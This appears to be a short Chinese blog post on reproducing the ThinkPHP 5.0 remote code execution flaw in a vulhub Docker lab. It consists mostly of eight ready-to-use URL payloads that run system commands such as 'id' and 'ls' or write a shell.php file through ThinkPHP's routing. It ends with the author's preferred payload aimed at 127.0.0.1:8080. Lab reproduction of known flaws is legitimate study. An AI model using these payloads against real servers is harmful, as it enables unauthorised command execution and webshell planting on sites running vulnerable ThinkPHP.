thinkphp 5.0 代码执行漏洞
https://github.com/vulhub/vulhub/blob/master/thinkphp/5-rce
docker-compose -f /home/root/compose.yml up
然后访问127.0.0.1:8080
POC:
1、?s=index/\think\Request/input&filter=phpinfo&data=1
2、?s=index/\think\Request/input&filter=system&data=id
3、?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
4、?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
5、?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
6、?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
8、?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
看那个好用用哪个,我是直接用第六个:
http://127.0.0.1:8080/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
最新文章
- ccs3
- C++中函数的默认参数和C语言中volatile的学习
- java操作word
- c++空指针调用类成员函数
- Sicily 1732 Alice and Bob (二进制最大公约数)
- jQuery的Nicescroll滚动条插件使用方法
- 深入剖析虚拟DOM提升性能(Vue,React);
- js中类似null==flase的比较图集
- Median
- C++ 属性类
- 【Jenkins】testng+testNgXslt+ant优化测试报告
- 将 GitHub 上的代码向 Coding 更新
- LG Optimus L90 [D415] T-Mobile 刷机
- 基于内存,redis,mysql的高速游戏数据服务器设计架构 ZT
- AngularJS开发经验
- C# Timer自带定时器
- Mathcad操作tips:函数、符号计算
- docker从零开始网络(二)桥接网络
- JDK所有版本
- Linux命令之添加权限Chmod的使用
热门文章
- @Resource 注解的作用【和 @Autowired 的对比】
- centos中apache自用常用额外配置记录(xwamp)
- SQL Server Management Studio(SSMS)的使用与配置整理
- 【.Net】net 反射15分钟速成
- 【codeforces914G】Sum the Fibonacci FWT+FST(快速子集变换)
- 51nod 1526 分配笔名(字典树+贪心)
- CF335F Buy One, Get One Free 贪心
- HDU-3974 Assign the task题解报告【dfs序+线段树】
- php配置说明
- 【bzoj3173】最长上升子序列